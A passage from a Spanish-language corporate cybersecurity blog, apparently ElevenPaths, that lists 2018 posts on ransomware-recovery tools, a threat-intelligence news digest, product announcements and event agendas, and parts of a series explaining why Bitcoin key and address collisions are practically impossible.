a trabajar en los retos tecnológicos que la verdadera transparencia de datos requiere con el objetivo de generar una nueva economía de datos y confianza. Con el fin de financiar anualmente más cantidad de proyectos se lanza la presente convocatoria de herramientas para crear una comunidad que permita el desarrollo de programas y aplicaciones en código abierto destinadas a mejorar la gestión de los datos por parte de particulares y empresas. El programa de becas del Data Transparency Lab (DTL) se creó en 2015 para dar apoyo a la investigación y desarrollo de herramientas para empoderar a los usuarios y recuperar el control de sus datos personales. Desde su creación, el DTL ha invertido 900.000€ en becas destinadas a 18 proyectos de universidades internacionales como Princeton, Berkeley, la Universitat Pompeu Fabra o la Carlos III de Madrid, entre otras.
9 de agosto de 2018
Cómo combatir las principales amenazas digitales de la mano de ElevenPaths
Varias son las amenazas de ciberseguridad que afrontan a diario tanto organizaciones como particulares. Entre todas estas amenazas caben destacar dos que pueden comprometer la seguridad de nuestros equipos: las vulnerabilidades y el malware. De ello somos muy conscientes en ElevenPaths, la unidad de ciberseguridad de Telefónica, y para ello todos los equipos de la compañía trabajan duro en el diseño y desarrollo de soluciones y productos que puedan ayudar a todo tipo de organizaciones y personas a combatirlas. En el ámbito de las vulnerabilidades son muchas las iniciativas en las que sestamos trabajando desde hace tiempo, como pueden ser Faast () o VAMPS. Todo ello, con la idea de que las organizaciones conozcan las vulnerabilidades que les pueden afectar a diario. Para ello, se ha trabajado en la posibilidad de disponer un pentest automático y persistente sobre los activos de las empresas. En cuanto al malware también se trabaja duro en crear soluciones que en algunos casos generan pruebas de concepto e ideas locas que se pueden encontrar en la página del lab. Entre todas ellas, destacan tres herramientas destinadas a combatir el malware. Una de ellas está ideada para prevenir los ataques del ransomware y las otras dos que se generaron a raíz de malwares concretos y que están a disposición del público para poder ayudar a los usuarios a recuperar sus datos en caso de haber sido víctimas de ellos. Latch Antiransomware: permite bloquear el acceso de escritura a aquellos directorios o archivos que normalmente sólo se consultan, como son las fotos de las vacaciones o las facturas de ejercicios vencidos. RecoverPopCorn y WannaCry File Restorer: PopCorn es un ransomware que se hizo muy popular hace unos meses por utilizar una innovadora técnica de propagación social, en la que se prometía devolver los datos al usuario si infectaba a otros dos usuarios con dicho ransomware. Por suerte pudimos encontrar una debilidad en el malware que nos permitía recuperar la contraseña con la que se cifran los archivos del usuario sin que tuviera que pagar por ella. A raíz de los ataques de WannaCry y mediante un cuidadoso análisis realizado por los equipos de malware de ElevenPaths, fuimos capaces de encontrar fallos en WannaCry que permitían ser capaces de recuperar los datos cifrados, y se generó una herramienta para que los usuarios pudieran recuperar sus datos. Pero en ElevenPaths no nos detenemos en generar este tipo de herramientas que ponemos a disposición de todo el público de forma gratuíta, también trabajamos en soluciones que ayudan a las organizaciones a combatir las amenazas relacionadas con el malware como es el caso de CyberThreats. Con el auge de los teléfonos móviles, el malware también ha evolucionado para poder atacar a estos entornos. Para ello, hemos desarrollado soluciones y productos como son Tacyt o mASAPP. También somos conscientes de que la única forma de luchar a día de hoy contra el malware es mediante la colaboración entre empresas y organismos. Por ello, formamos parte de alianzas que ayudan a compartir IOCs o indicadores de compromiso como son la CTA (Cyber Threat Alliance) o la iniciativa NoMoreRansomware. Y si todo esto no fuese suficiente, también adquirimos tecnología que nos ayuda a mejorar la detección y respuesta contra el malware con la compra de Dinoflux, o nos centramos en el desarrollo de tecnología que detecte malware en documentos informáticos respetando la privacidad de los datos que contengan. Nos centramos en el código que puedan contener (Macros o código Javascript) detectando amenazas sin necesidad de que el contenido del documento salga a la red como Diario. Como habéis podido comprobar, desde ElevenPaths se realiza una apuesta muy fuerte para combatir dos de las grandes amenazas que tenemos a día de hoy en la ciberseguridad: las vulnerabilidades y el malware.
19 de julio de 2018
#CyberSecurityPulse: triste aportación en Estados Unidos de la empresa privada a la compartición de inteligencia de amenazas
Después de un poco más de dos años de que el Congreso aprobara un importante proyecto de ley que incentivaba a las empresas a compartir con el gobierno cómo y cuándo threat actors están tratando de introducirse en sus sistemas, sólo seis empresas y otras entidades no federales han compartido esa información, según las cifras proporcionadas al medio de comunicación Nextgov. Cifras muy pobres en comparación con las 190 entidades y los 60 departamentos y agencias federales que están recibiendo datos sobre amenazas del programa de intercambio automatizado de indicadores de Seguridad Nacional. Esa baja cifra de participación del sector privado es un golpe adicional al programa, que ha luchado por proporcionar a las empresas y organismos gubernamentales el tipo de inteligencia procesable que prometió la Ley de Ciberseguridad de 2015. Dicha ley prometía protecciones de responsabilidad a las empresas si compartían indicadores de ciberamenazas con el gobierno y entre sí. En este sentido, no protegía a las compañías de ser demandadas si eran vulneradas, pero prohibía a los clientes demandar a la compañía simplemente por compartir su información con el gobierno. La idea era que el gobierno organizara y priorizara toda la información sobre amenazas de las empresas, la combinara con el propio almacén de datos sobre amenazas del gobierno, recopilados por los servicios de inteligencia y Seguridad Nacional, y compartiera el resultado con cualquiera que estuviera interesado, reforzando la defensa colectiva de la nación. Según expertos, el problema se reduce a incentivos. CISA dio a las empresas protección legal para compartir información sobre amenazas con el gobierno, pero no justificó por qué iba a interesarles hacerlo. Es muy sencillo consumir los datos que otros producen, sin embargo el problema se encuentra en convencer a las empresas de que tienen la responsabilidad social de hacerlo. Más información en Nextgov Noticias destacadas California, en busca de una nueva ley de privacidad Los legisladores de California aprobaron por unanimidad el jueves una nueva ley de privacidad que otorgaría a los residentes del estado más control sobre la información que las empresas recaban sobre ellos e impondrá nuevas sanciones a las empresas que no cumplan. En concreto, tiene el objetivo de otorgar a los californianos el derecho a ver qué información recaban sobre ellos las empresas, solicitar que se elimine, obtener acceso a información sobre los tipos de compañías a las que se les vendió su información y ordenar a las empresas que dejen de vender esa información a terceros. La ley contiene un lenguaje similar a la GDPR, aunque crea lo que denominan como la "excepción de Spotify", que permite a las empresas ofrecer diferentes servicios o tarifas a los consumidores en función de la información que brindan, por ejemplo, un producto gratuito basado en publicidad. Sin embargo, según el proyecto de ley, la diferencia debe estar "razonablemente relacionada con el valor proporcionado al consumidor por los datos del consumidor". Más información en Wired WhatsApp premia a aquellas investigaciones destinadas a la lucha de las fake news WhatsApp publica un concurso en el que se premiará a aquellos investigadores interesados en explorar problemas relacionados con la desinformación en WhatsApp. Dichos premios irán destinados a financiar propuestas de investigación independientes diseñadas para ser compartidas con WhatsApp, Facebook, comunidades académicas y políticas más amplias. En este sentido, WhatsApp priorizará entre las siguientes áreas de investigación: procesamiento de información de contenido problemático, información relacionada con las elecciones, efectos de red y viralidad, alfabetización digital y desinformación, detección de comportamiento problemático dentro de sistemas cifrados. Las solicitudes deben enviarse antes del 12 de agosto de 2018. Los ganadores del premio serán notificados del estado de su solicitud por correo electrónico antes del 14 de septiembre de 2018. Más información en Whatsapp Noticias del resto de la semana Facebook implementa restricciones a su API y publica un error de bloqueo Además de implementar estándares más estrictos dentro de su proceso de revisión de aplicaciones, Facebook está requiriendo permisos avanzados de desarrollador en algunas APIs y cerrando otras por completo. Por otro lado, también ha publicadola existencia de un error tanto en Messenger como en Facebook en el que eliminaba la lista de usuarios bloqueados de algunas personas. "El error estuvo activo entre el 29 de mayo y el 5 de junio y, aunque alguien que no estaba bloqueado no podía ver el contenido compartido con sus amigos, podría haberse estado comportiendo ciertas cosas a una audiencia más amplia. Por ejemplo, fotos compartidas con amigos de amigos", escribió Erin Egan, directora de privacidad de Facebook. Más información en Facebook Thunderbird recibe su parche para EFAIL Thunderbird ha introducido las correcciones para una docena de vulnerabilidades de seguridad, incluyendo el correspondiente a la vulnerabilidad de EFAIL descubierta el pasado mes de mayo. Las correcciones específicas de EFAIL abordan dos errores en el manejo de mensajes cifrados por parte de Thunderbird: CVE-2018-12372, en el que un atacante puede construir oráculos de descifrado S/MIME y PGP en mensajes HTML, y CVE-2018-12373, en el que se puede filtrar texto plano S/MIME si se reenvía un mensaje. Más información en Mozilla Nuevo virus que decide si un equipo es óptimo para la minería o ransomware Los investigadores de seguridad han descubierto una interesante pieza de malware que infecta sistemas para minar criptodivisas o con un ransomware. Dependiendo de la configuración del equipo, decide cuál de los dos esquemas podría ser más rentable. Investigadores han descubierto esta nueva variante de la familia Rakhni ransomware, que ahora ha sido actualizada para incluir también la capacidad de minería de criptodivisas. Otras noticias Los parches de Google para Android de julio de 2018 corrigen vulnerabilidades críticas Más información en Android Abuso de acortadores URL para minar criptodivisas usando webs comprometidas Más información en Malwarebytes Gran parte de las muestras de LokiBot son versiones modificadas del malware original Más información en The Hacker News
10 de julio de 2018
Qué hemos presentado en Security Day 2018 (I): Bienvenida y Keynote
El pasado 30 de mayo celebramos la quinta edición de nuestro evento anual en ciberseguridad, ElevenPaths Security Day 2018, con el lema 'Cybersecurity On Board'. Bajo este claim, queríamos mostrar el valor intrínseco que proporcionamos a todos los productos de la compañía, que se materializa en un viaje end to end. Un sello de calidad con el que dotamos a todos nuestros servicios, para garantizar a las empresas un camino seguro y que la confianza que depositan en nuestros servicios crezca. Un viaje, en el que ElevenPaths acompaña a sus clientes, hasta lograr la madurez en seguridad de cada uno de ellos. Durante la jornada, anunciamos que ElevenPaths se ha consolidado como proveedor de servicios en ciberseguridad, Intelligent Managed Security Service Provider (MSSP). El evento comenzó con una bienvenida impartida por Pedro Pablo Pérez (Vicepresidente de Seguridad de Telefónica y CEO de ElevenPaths) y Jose Luis Gilpérez (Director de Administración General del Estado, Defensa y Seguridad en Telefónica España). Hablaron sobre el recorrido que la compañía ha realizado durante el último año, y qué está haciendo Telefónica, tanto en España como en el resto del mundo. Y por último, se realizó una agradecimiento a todas las organizaciones y partners por el trabajo que realizan junto a nosotros. De cara al 2018, los Consejos de Dirección están cada vez más preocupado por el tema de la ciberseguridad. El Gobierno Nacional ha actualizado la Estrategia de Seguridad Nacional, contemplando las amenazas "híbridas". Las autoridades europeas alientan las inversiones en ciberseguridad y promueven la defensa de la privacidad. Por último, los medios de comunicación dedican gran atención a los incidentes de seguridad, el control de la privacidad y la reputación online. Durante la keynote, nuestro Chairman, Chema Alonso, habló sobre los avances de los productos que presentamos la pasada edición del Security Innovation Day 2017. Han sido 5 años desde que lanzamos ElevenPaths, este proyecto cuyo objetivo fue y es crear innovación orientado a producto. Según Chema "el mejor lugar en el que debe de estar nuestras tecnologías es en las manos de nuestros clientes". Los avances que presentamos durante el Security Day 2018 fueron: Shadow Online: trazabilidad invisible de documentos. Lo hemos convertido en producto de fácil utilidad para todos nuestros clientes, inmediato, seguro en todo momento e integrable mediante APIs. Es una tecnología capaz de marcar, de manera imperceptible, documentos e imágenes, facilitando así su posterior identificación, clasificación y trazabilidad. FaasT for WordPress: una versión de nuestra plataforma de pentesting persistente centrada en uno de los gestores de contenidos más populares que existen hoy en día en Internet: WordPress. Esta plataforma en cloud realiza pentesting persistente a todas nuestras plataformas 365 días al año. En un estudio, nuestro equipo del SOC (Security Operation Center) identificó en los 65 plugins más populares de WordPress 162 patrones de flujo susceptibles a vulnerabilidades. De estos, 10 de LFI RFI, 1 de Remote Command Execution y 2 de SQL Injection. Los que fueron verificados por nuestro equipo que puedían ser utilizados por un atacante para quebrantar la vulnerabilidad de un WordPress fueron un total de 12. Estas 12 vulnerabilidades afectan a 1,2 millones de WordPress en el mundo. Self-service: todos nuestros productos disponibles en la web de EevenPaths van a comenzar a ser self-service. En breve, con entrar en la web y registrarse, se va a poder comprar las APIs que el usuario quiera utilizar. mASAPP Online: monitoriza la seguridad de las aplicaciones móviles que se suben a los markets. Latch: celebramos el quinto aniversario de este producto. Las características actuales de Latch son: Mejora del soporte TOTP para que puedas usar Latch en más sistemas Mejora de guías de uso de Latch con los principales servicios cloud Comprueba si tu cuenta de correo se ha visto afectada en robos masivos de credenciales Mejoras a desarrolladores para monitorizaión de uso de latch y disponibilidad de nuevos plugins Concedida la 3º patente en US sobre prevención en ataques de autenticación Metashield Bot: encuentra y limpia los metadatos de tus fotos y documentos de forma todavía más sencilla y desde cualquier plataforma. Utiliza la potencia de Metashield a través de los programas de mensajería instantánea e intercambio de archivos Skype, Slack o Telegram. Tan solo arrastra o envía los archivos a nuestros bots, y de forma automática, se encargarán de limpiarlos y mostrar la información sensible que pudiera quedar almacenada en ellos. Nueva adquisición de Dinoflux: esta startup cuenta con una tecnología que permite que todos los servicios que damos a nuestros clientes de CyberThreats se enriquezcan. Es una solución creada por tres emprendedores con tecnología Big Data, Machine Learning y Análisis Automático, para generar IOCs, indicadores de compromiso, de manera automática. En resumen, mediante esta solución se acorta el tiempo de protección hacia una amenaza detectada en tiempo real. Para más información acerca del evento accede a la web de securityday.elevenpaths.com. » Security Day 2018: Welcome on board! » ElevenPaths se consolida como proveedor de servicios en ciberseguridad » Qué hemos presentado en Security Day 2018 (II): Mantente actualizado, mantente seguro: nuevos productos
13 de junio de 2018
Colisiones, haberlas hay(las). Parte 4.
En la entrada anterior sobre este tema, analizamos cómo las claves privadas de Bitcoin son suficientemente seguras, siempre que se utilicen de forma correcta. Pero, ¿qué sucede con las claves públicas y sobre todo, con los algoritmos de hash SHA-256 y RIPEMD-160?, ¿serán suficientemente seguros para impedir colisiones en las direcciones de Bitcoin? ¡Vamos a verlo! Claves públicas y direcciones de Bitcoin En los criptosistemas de curva elíptica, cada clave pública es un punto de la curva referenciado por sus coordenadas (x,y), el cual ha sido obtenido a parir de la clave privada. En el caso de Bitcoin y su curva “secp256k1”, las coordenadas “x” e “y” son dos números de 256 bits de tamaño. La clave pública puede expresarse de dos formas, según se utilicen una (x), o las dos coordenadas (x,y), generalmente en codificación hexadecimal: Sin comprimir (uncomppressed) 65 bytes: “04” + x + y Comprimida (compressed) 33 bytes: “02 o 03” + x (02 si X es par o 03 si es impar) Desde la primera versión del protocolo Bitcoin se soportan dos “métodos de pago” o posibles salidas de una transacción: P2PK (Pay to Public Key): Pago a una clave pública P2PKH (Pay to Public Key Hash): Pago al hash de una clave pública (dirección de Bitcoin) Un P2PKH es lo que se conoce generalmente por “dirección” (address) de Bitcoin. Se obtiene realizando un “doble Hash” (a veces llamado HASH160). Primero un hash SHA-256 sobre la clave pública, ya sea comprimida o sin comprimir, y sobre el resultado de este, un nuevo hash RIPEMD-160. Posteriormente, se le añade un byte de versión al inicio y cuatro de suma de verificación al final, y se codifica todo en Base58. Comienzan siempre por un “1” si la versión se corresponde con la red real de Bitcoin. No es posible distinguir si la clave pública de origen está en formato comprimido o sin comprimir; únicamente para facilitar su gestión, se puede expresar una misma clave privada en formato WIF de dos maneras diferentes: cuando comienzan por “L” o “K” para generar la dirección comprimida, y cuando comienzan por “5” para generar la dirección sin comprimir. En 2012, mediante la adopción del BIP0016, se añadió la posibilidad de realizar el pago a un hash de script o P2SH (Pay to Script Hash) lo que permite, por ejemplo, definir las direcciones, monederos o carteras multifirma, como destino de una transacción. Los hashs de script se identifican fácilmente, ya que al codificar el hash en Base58 siempre comienzan con un “3” en lugar de con un “1” como lo hacen los hashs de clave pública. A día de hoy, los P2SH representan aproximadamente el 25 % de las salidas en transacciones de Bitcoin. Este dato está disponible en tiempo real en la web informativa p2sh.info. Satoshi Nakamo debió recelar ante los avances en computación cuántica, sobre todo, a raíz de la implementación del algoritmo de Shor. Este mismo temor inquieta a la NSA, ya que cada vez está más próximo el día en que los ordenadores cuánticos dispongan de los “qubits” suficientes para reventar los criptosistemas actuales. Ignacio Cirac, director de la División Teórica para la Óptica Cuántica del Instituto Max-Planck desde 2001b , y desde 2016 consejero adjunto de Telefónica, lo explica de forma clara y amena en cualquiera de sus conferencias. Si quieres saber más, no te pierdas esta. Para evitar este riesgo, implementó el método de “pago a hash de clave pública” P2PKH, en detrimento del pago directo a clave pública P2PK. De esta forma, la clave pública sólo se expone en el momento de “gastar”, utilizar los bitcoins en el input de una transacción, pero no al recibirlos en el output de una transacción previa; y siguiendo la recomendación de no reutilizar direcciones, se suprime toda posibilidad de ataque al algoritmo ECDSA. El hash de P2PKH es doble; por si un sólo hash SHA-256 (256 bits) no fuese suficiente, al resultado se le hace otro hash, pero en este caso un RIPEMD-160 (160 bits). 160 bits, ¡menuda reducción!. Puede entenderse que quisiera redoblar la seguridad con un segundo hash, y que eligiera RIPEMD por su origen Europeo en contraste con los SHA Norteamericanas que vimos en la primera parte de la serie, como el equivalente de 160 bits “SHA-1” propuesto por la NSA es vulnerable al encontrarse la forma de generar colisiones. Pero, la reducción de 256 bits a 160 bits tiene notables consecuencias, que además, podían haberse evitado simplemente con utilizar la variante RIPEMD-256, aunque las direcciones de Bitcoin resultasen un poco más largas. ¿Qué implica reducir de 2^256 posibles valores, a 2^160 posibles valores? Colisiones, sí, y muchas. Exactamente (2^256 / 2^160) = 2^96. Es decir, para cada dirección de Bitcoin existen casi “ocho mil cuatrillones” de claves públicas que generan la misma dirección. Esto es más de 10^28. Hay muchas más claves que generan una misma dirección de Bitcoin que estrellas en el Universo. Entonces, si el protocolo de Bitcoin prevé un volumen tan ingente de colisiones, ¿no hay nadie buscando alguna? Probablemente habrá muchos proyectos, aunque por diferentes cuestiones, no son públicos y, por tanto, tampoco conocidos, pero merece la pena mencionar uno tan peculiar como controvertido: el “Gran Colisionador de Bitcoin”. El LBC es un pool que agrupa a diferentes workers que han unido su capacidad de trabajo en busca de una colisión de claves de Bitcoin. Lo hacen de una forma un tanto peculiar, ya que para comprobar que han encontrado una colisión real, sólo comparan las direcciones que generan con direcciones ya utilizadas en la cadena de bloques, y que además aun contengan bitcoins sin gastar, con la esperanza de que el propietario original reclame los fondos, pudiendo entonces verificar que se trata de dos claves diferentes y no de una misma. Para solucionar la problemática que implica la comparación de las direcciones generadas con una muestra valida, dicen utilizar una estructura de datos probabilística conocida como “filtro de Bloom”. Pero, tanto la elaboración del filtro como cualquier otro detalle del funcionamiento del pool, no es compartido, y la mayor parte del software está ofuscado, por lo que pese a que han publicado varios casos de existo en su sección de “trofeos”, no puede considerarse un proyecto serio. Mantiene, eso sí, una fiel copia de directory.io. Aunque, posiblemente sean los generadores de direcciones de vanidad el intento que más se aproxime a la búsqueda de una colisión. Se conocen como direcciones de vanidad a aquellas direcciones de Bitcoin que comienzan o contienen una secuencia específica de caracteres, cuya única forma de encontrar es mediante fuerza bruta, generando miles de millones de direcciones e ir comparándolas con el patrón especificado, normalmente con una expresión regular. Si bien comenzó como una curiosidad, el software para generar estas direcciones ha evolucionado considerablemente, implementándose en OpenCL para ser ejecutado en los cientos o miles de núcleos disponibles en las GPUs, y extendiéndose a otras criptomonedas. Pese a la elevada capacidad de computo que se alcanza con la implementación en GPUs, el número de intentos requeridos para encontrar un pequeño texto es tan enorme, que el tiempo necesario, literalmente, se eterniza. Por ejemplo, dar con una dirección de Bitcoin que comience por “11Paths” como “11PathsQEx9FmFSiGY873i4BtTtDdYcKh”, necesitaría un billón de intentos (10^12), que pueden realizarse en menos de un día. Pero con tan solo dos cárteres más “11Paths11”, los intentos necesarios se acercan al trillón (10^18), elevándose el tiempo necesario a varios años. Si tienes una tarjeta gráfica de última generación, y en lugar de participar en una competición online, decides ponerla a generar, tan solo, los ocho mil cuatrillones (10^28) de claves que serían necesarios tener, una probabilidad razonable de encontrar una colisión de dirección completa, tardarías unos 10000 millones de años, que es algo menos de la edad del Universo. La edad del Universo está estimada entre 13761 y 13835 millones de años. Dada la extrema dificultad que conlleva generar direcciones de vanidad, existen pooles para agrupar el trabajo de varios usuarios, e incluso webs que lo ofrecen como un servicio de pago. De cualquier forma, utilizar estas direcciones es una práctica totalmente desaconsejada, sobre todo si te la provee un tercero, ya que será conocedor de la clave privada correspondiente. En términos generales, el grueso de los usuarios de Bitcoin se ciñen a las practicas recomendadas en la especificación del protocolo, generando las direcciones de forma totalmente aleatoria y no reutilizándolas en más de una ocasión. La mayoría de las más de 100 millones de direcciones que figuran en la cadena de bloques, solo tiene dos transacciones, una primera de entrada y una segunda de salida. Esto, sumado a que cada vez es mayor el uso pago a hash de script P2SH, hacen que el riesgo de pérdida de bitcoins por una colisión de dirección sea prácticamente nulo. Podemos concluir por tanto que, los algoritmos criptográficos utilizados en Bitcoin, ECDSA curva “secp256k1”, hash SHA-256 y hash RIPEMD-160, son suficientemente seguros al no existir vulnerabilidades conocidas, y pese a que el protocolo de Bitcoin prevé un importante número de colisiones de dirección, la probabilidad de verse afectado por una es insignificante. Como usuarios finales, la criptografía que hay detrás del Bitcoin no debería preocuparnos, pero sí que debemos tener otras muchas precauciones, incluso si utilizamos wallets físicos;. En anteriores ocasiones, comentamos la facilidad con la que un mal uso te hace perderlo todo. Jorge Rivera CSA, Chief Security Ambassador jorge.rivera@11paths.com » Colisiones, haberlas hay(las). Parte 1 » Colisiones, haberlas hay(las). Parte 2 » Colisiones, haberlas hay(las). Parte 3
2 de junio de 2018
Telefónica celebra el evento Network Innovation Day: Seguridad para construir la red del futuro
Porque necesitamos una red cada vez más flexible y basada en software, este año queremos compartir contigo nuestra visión sobre cómo será la red del futuro. Telefónica organiza el próximo 14 de junio el evento más importante del año de innovación en la red: Network Innovation Day- We are in. ¡REGÍSTRATE AQUÍ! El lema para nuestro evento de innovación en la red es: We are in. Desde dentro. Desde el corazón. Desde el centro neurálgico de Telefónica llega la verdadera transformación de la red. Gracias a la Inteligencia Artificial (IA), el Big Data, el 5G y la Seguridad recorremos un camino innovador revolucionando todos los procesos e infraestructuras técnicas hacia el futuro digital de nuestros clientes. ¡Reserva ya tu sitio y regístrate ahora! Conoce de la mano de nuestros expertos las líneas de innovación tecnológica de Telefónica para responder a los nuevos desafíos que plantea la industria. Intervienen: Chema Alonso, Chief Data Officer de Telefónica; Enrique Blanco, Global CTO de Telefónica, Pedro Pablo Pérez, CEO de ElevenPaths y destacados expertos del sector. Nuestro CEO, Pedro Pablo Pérez, nos explicará en su ponencia de Seguridad en la red cómo Telefónica ofrece seguridad de forma masiva a todos nuestros clientes sin importar si su conectividad es fija o móvil. Explicará cómo en Telefónica estamos convencidos de que debemos incorporar la seguridad en el propio diseño de los servicios de comunicaciones, y en este sentido, hemos incorporado en ellos las funciones de seguridad de red que los clientes pueden activar, modificar y consumir con agilidad dónde y cuándo sean requeridos, para proteger sus recursos con independencia de dónde se sitúen dentro de este nuevo modelo de red “extendida”. ¡No dejes pasar esta oportunidad! Te esperamos el próximo 14 de junio a las 9:30h (CET) en el Auditorio de Distrito Telefónica. Consulta los contenidos que se presentarán en el evento Network Innovation Day 2018: 9.30 Acreditación 10.00 La innovación en el core. Guillermo Ansaldo 10.30 Planificación y operación de redes Data-Driven. Chema Alonso 10:45 Neptuno. Andrés Vega 11.00 Virtualizando la red extremo a extremo. Enrique Blanco 11:10 Towards end to end Network Virtualization. Aurelia Martinez 11:20 We are the new B2B platform. Hugo de los Santos 11:30 Edge Computing. David del Val 11.45 Café 12.15 Seguridad desde la red. Chema Alonso y Pedro Pablo Pérez 12:35 Ordenadores cuánticos y la seguridad de las redes. Ignacio Cirac (special guest) 13.00 Hacia redes dinámicas basadas en Inteligencia Artificial. Juan Carlos García 13:05 Self-Organizing Networks. Raquel García 13:15 Artificial Intelligence 5G Readyness. Francisco Montalvo y Mercedes Jimenez 13:25 CPE como Plataforma de Servicios. Rubens Cesar Lima 13.30 Cierre institucional. Chema Alonso y Enrique Blanco ¡No te pierdas ningún detalle! Síguenos en nuestras redes sociales con el hashtag #NID2018. Recuerda que si no puedes asistir al evento, accede aquí y regístrate al evento en streaming.
28 de mayo de 2018
Colisiones, haberlas hay(las). Parte 3.
En la entrada anterior sobre este tema comentamos la idoneidad del algoritmo ECDSA y más concretamente, de la curva “secp256k1”. No estando afectado por vulnerabilidades conocidas, se podría considerar seguro, aunque esto, depende en gran medida de cómo se utilice. Pues, ¡vamos a analizarlo! Claves privadas de Bitcoin Al igual que otros sistemas de Criptografía Asimétrica, ECDSA se fundamenta en el binomio de claves privadas y claves públicas. En Bitcoin, según están definidos los parámetros de dominio de la curva “ secp256k1”, una clave privada puede ser cualquier número comprendido entre 1 y el número de puntos de la curva u orden “n” menos 1: n = 115792089237316195423570985008687907852837564279074904382605163141518161494337 - 1 El valor de “ n-1” es algo menos de 2^256, pero es un número tremendamente grande. Tanto, que cuesta trabajo imaginarse sus colosales dimensiones, e incluso escribirlo en formato decimal, ya que tiene 78 cifras, aproximadamente 10^77. 10^77 es un número tan descomunal, que es difícil incluso de comparar; los granos de arena de todas las playas del planeta rondan los 10^20, y todas las estrellas del Universo apenas llegan a 10^23. Solo el cálculo aproximado de todos los átomos del Universo 10^80, está en su orden de magnitud, siendo ambos sobrepasados ampliamente por el Número de Shannon 10^120, que representa el número teórico de partidas de ajedrez posibles. Mientras que no se descubra alguna vulnerabilidad en el algoritmo, o la computación cuántica consiga llevar la capacidad de computo a limites desconocidos, se puede considerar que una clave privada de 256 bits es suficientemente segura para criptosistemas de curva elíptica, siempre y cuando dicha clave sea generada de forma verdaderamente aleatoria. Si la generación de la clave privada se lleva a cabo de forma verdaderamente aleatoria, la probabilidad de colisión tiende tanto a cero que no puede, ni siquiera, llegar a tenerse en consideración. Existen precedentes donde una implementación errónea de la generación de claves, o como parte de alguna prueba de concepto, se utiliza un número, no ya predecible, sino simplemente igual a “1” (primera clave privada) o igual a “n-1” (última clave privada) como clave privada. Matemáticamente es posible resolver la ecuación de la curva con un número de clave privada mayor a “n-1”, por ejemplo “n”, pero al tratarse de un factor modular, el resultado será la misma clave pública generada a partir de la clave privada “1”. Esto no puede considerarse una colisión de claves privadas; la mayoría de las implementaciones devuelve un error al tratar de utilizar como clave privada un valor superior a “n-1”. Por ejemplo en el módulo pybitcoin de Python v2.7: raise IndexError(_errors["EXPONENT_OUTSIDE_CURVE_ORDER"]) IndexError: Secret exponent is outside of the valid range. Must be >= 1 and < the curve order. En cualquier caso, ya sea por error, como parte de una prueba de concepto, o por mera experimentación, las direcciones de Bitcoin correspondientes a las claves privadas “1” y “n-1”, han sido utilizadas en el pasado, y sorprendentemente, continúan siendo utilizadas en el presente, tal y como se puede comprobar explorando la cadena de bloques: Clave privada “1”, dirección comprimida: 1BgGZ9tcN4rm9KBzDn7KprQz87SZ26SAMH Clave privada “1”, dirección sin comprimir: 1EHNa6Q4Jz2uvNExL497mE43ikXhwF6kZm Clave privada “n-1”, dirección comprimida: 1GrLCmVQXoyJXaPJQdqssNqwxvha1eUo2E Clave privada “n-1”, dirección sin comprimir: 1JPbzbsAx1HyaDQoLMapWGoqf9pD5uha5m ¿Quiere esto decir que se conocen las claves privadas de todas las direcciones de Bitcoin? No, más bien, lo que quiere decir es que, se pueden calcular las direcciones de Bitcoin de todas las claves privadas que existen; el problema es, como hemos visto, que son demasiadas. Son tantas que, en base a la potencia de cálculo actual, se tardarían decenas de miles de millones años en computarse; sin mencionar que, un hipotético dispositivo para almacenarlas excedería el tamaño de nuestra galaxia. No obstante, estos pequeños detalles no han supuesto un impedimento a la hora de tratar de representar todas las claves privadas y sus direcciones de Bitcoin correspondientes. Sí, “todas”, pero no de golpe, solo aquellas que se consulten. Este fue precisamente el objetivo del proyecto directory.io, el cual hoy ya no está operativo, pero han surgido otras muchas webs, donde con algo de publicidad, ofrecen un servicio similar e incluso mejorado, al consultar en la cadena de bloques los fondos que pudiera haber en las direcciones de Bitcoin obtenidas: http://www.allprivatekeys.com/allprivatekeys.php https://privatekeys.pw/keys En la siguiente captura del 1 de diciembre de 2013 almacenada por archive.org, se observa como directory.io muestra únicamente las direcciones sin comprimir, que eran las más utilizadas en los primeros años de Bitcoin, destacando que comienza por la polémica dirección no valida “ 16QaFeudRUt8NYy2yzjm3BMvG4xBbAsBFM”, ya que, pese a haber recibido varias transacciones, no es una dirección utilizable, al corresponderse con una clave inexistente, cuyo valor teórico sería cero. Su jocosa FAQ estaba repleta se sarcasmos. El código fuente original de directory.io estuvo disponible por algún tiempo, y pese a que no aportaba ninguna novedad destacable, ciertos matices en su estructura eran semejantes a los encontrados en el código fuente original de Bitcoin que publicó Satoshi Nakamoto. Por ello, se vinculó al creador de Bitcon con su mantenedor, Arran Walker, que además publica en su espacio de GitHub una variante optimizada en lenguaje GO. No es necesario mencionar que cualquier cantidad de bitcoins transferida a cualquiera de estas direcciones cuya clave privada es conocida, es inmediatamente sustraída por alguno de los cientos de “ bots” que están monitorizando permanentemente el “mempool” de la red de Bitcoin, a la espera de una transacción incauta. Esta operativa de robo de bitcoins de forma automática e instantánea por medio de bots, que incluso compiten entre ellos, fue diseccionada por Yaiza Rubio y Felix Frezo en la ponencia que ofrecieron en la RootedCON de 2015. El objetivo en esta ocasión eran las direcciones de Bitcoin generadas a partir de “ carteras mentales”; una práctica totalmente desaconsejada, ya que los bots cuentan con millones de claves precalculadas, a partir de diccionarios de múltiples idiomas y de contraseñas habituales. Este uso ha sido relegado a favor del BIP0039, que genera una estructura de claves y direcciones de modo determinista a partir de una relación de 12 palabras a elegir entre 2048, con la que se obtiene una entropía de 128 bits; de momento suficiente para mantener a salvo cualquier wallet. De igual forma que no se puede considerar una colisión de clave privada cuando esta ha sido generada sin la suficiente aleatoriedad, tampoco se puede considerar una colisión cuando la clave privada ha sido generada a partir de una contraseña o palabras de un diccionario conocido o susceptible de haber sido previamente calculado. Se deduce entonces, que no existen colisiones conocidas, ni riesgo de haberlas a corto plazo, en las claves privadas de Bitcoin, siempre que estas se generen con suficiente aleatoriedad. Pero, ¿qué ocurre con las claves públicas y sobre todo con los algoritmos de hash SHA-256 y RIPEMD-160?, ¿serán suficientemente seguros para impedir colisiones en las direcciones de Bitcoin? Te lo contaremos todo en la cuarta parte, ¡no te pierdas la próxima entrega hacker! Y recuerda que si tienes dudas o quieres discutir más sobre el tema, puedes visitarnos en la Comunidad de ElevenPaths. Jorge Rivera CSA, Chief Security Ambassador jorge.rivera@11paths.com » Colisiones, haberlas hay(las). Parte 1 » Colisiones, haberlas hay(las). Parte 2 » Colisiones, haberlas hay(las). Parte 4
24 de mayo de 2018
Analizando extensiones de navegador con Neto Console
